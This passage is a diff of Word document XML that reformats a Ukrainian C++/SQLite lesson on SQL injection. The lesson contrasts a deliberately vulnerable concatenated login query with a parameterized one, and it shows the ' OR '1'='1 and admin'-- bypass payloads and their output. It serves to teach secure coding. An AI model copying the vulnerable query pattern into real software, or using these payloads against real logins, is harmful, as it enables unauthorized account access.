+              <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">// Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include &lt;iostream&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include &lt;string&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">#include "sqlite3.h"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// Створює навчальну базу в пам'яті з двома обліковими записами</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sqlite3* setupDatabase() {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3* db = nullptr;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_open(":memory:", &amp;db);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    const char* schema =</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "CREATE TABLE users ("</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "  id INTEGER PRIMARY KEY,"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "  login TEXT NOT NULL,"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "  password TEXT NOT NULL,"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "  role TEXT DEFAULT 'user');"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) VALUES ('admin', 'secret123', 'admin');"</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        "INSERT INTO users (login, password, role) VALUES ('user1', 'pass1', 'user');";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_exec(db, schema, nullptr, nullptr, nullptr);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return db;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        return false;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (found) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return found;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    if (found) {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    }</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return found;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">int main() {</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: " &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: " &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    return 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">}</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4085,233 +4834,303 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
